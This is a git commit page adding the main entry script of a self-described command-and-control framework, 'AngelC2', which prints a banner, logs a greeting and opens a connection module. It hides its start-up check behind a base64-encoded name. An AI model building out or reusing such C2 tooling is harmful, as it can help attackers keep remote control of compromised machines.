Upload files to "v1"

This commit is contained in:
2025-12-22 15:15:42 +00:00
parent d5de70103a
commit cd100b6904
44 changed files with 4420 additions and 0 deletions

24
v1/main.py Normal file
View File

@@ -0,0 +1,24 @@
import base64
from utils.logger import *
from utils.conn import *
from utils.mod import *
from constants import *
__name__ = "AngelC2"
__version__ = "0.1.0"
__authors__ = "hk21"
class Angel:
def __init__(self):
Logger()
Utils.clear_shell()
print(Consts.banner)
log.info("welc to angel net shell, fellow kitten!")
Conn()
if __name__ == base64.b64decode(b"QW5nZWxDMg==").decode("utf-8"):
Angel()